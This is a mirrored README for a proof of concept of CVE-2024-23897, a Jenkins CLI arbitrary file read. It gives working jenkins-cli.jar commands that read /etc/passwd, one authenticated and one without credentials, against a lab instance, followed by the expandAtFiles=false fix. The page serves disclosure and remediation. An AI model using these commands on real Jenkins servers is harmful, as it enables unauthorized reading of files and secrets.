Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-23897 PoC — Jenkins 安全漏洞

Source
https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897
Associated Vulnerability
Title:Jenkins 安全漏洞 (CVE-2024-23897)
Description:Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Description
on this git you can find all information on the CVE-2024-23897
Readme
# PoC-jenkins-rce_CVE-2024-23897.
<h2>On this git you can find all information on the CVE-2024-23897.</h2>

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/1200px-Jenkins_logo.svg.png" alt="logo-jenkins">
</div>
<h3>Introduction</h3>

The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.

<h3>PoC</h3>


For this PoC, I have installed Jenkins 2.426.2 with Docker to test the exploit of the vulnerability
```
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2
```

After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.
<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-java.png" alt="screen1">
</div>


Then, I wrote the command for the exploit.
In this command, we need to have the credentials of the Jenkins user.
```
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/Screenshot%20from%202024-01-27%2015-32-50.png" alt="screen2">
</div>


Another command allows displaying the first lines of a file without authentication.
```
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/noauth.png" alt="screen3">
</div>

<h3>Fix the vulnerability</h3>

To counter this vulnerability, you need to navigate to the Jenkins configuration file named config.xml (in my case, it is located in my Docker container, so I switch to shell mode in my container)


<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-resolve.png" alt="screen4">
</div>
and add the line:

```
<expandAtFiles>false</expandAtFiles>

```
and restart jenkins :
```
service jenkins restart
```
File Snapshot

 [4.0K]  /data/pocs/874a012fda11e30fdca8f3019c05ecfb19cf4336
├── [ 69K]  1200px-Jenkins_logo.svg.png
├── [ 11K]  free-jenkins-282182.png
├── [ 55K]  jenkins-java.png
├── [102K]  jenkins-resolve.png
├── [ 20K]  noauth.png
├── [2.3K]  README.md
└── [ 82K]  Screenshot from 2024-01-27 15-32-50.png

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →